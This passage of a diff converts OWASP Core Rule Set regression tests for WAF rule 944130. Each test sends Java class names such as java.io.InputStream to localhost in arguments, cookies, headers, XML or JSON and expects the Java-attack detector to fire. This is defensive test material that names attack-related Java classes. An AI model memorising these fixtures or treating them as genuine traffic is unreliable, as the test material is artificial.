"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 
944130-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 134 desc: "Argument name includes keyword 
java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log: + expect_ids: [944130] + - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
Cookie: test=java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 139 desc: "XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-140 + - 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: 
+ expect_ids: [944130] + - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-153 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - 
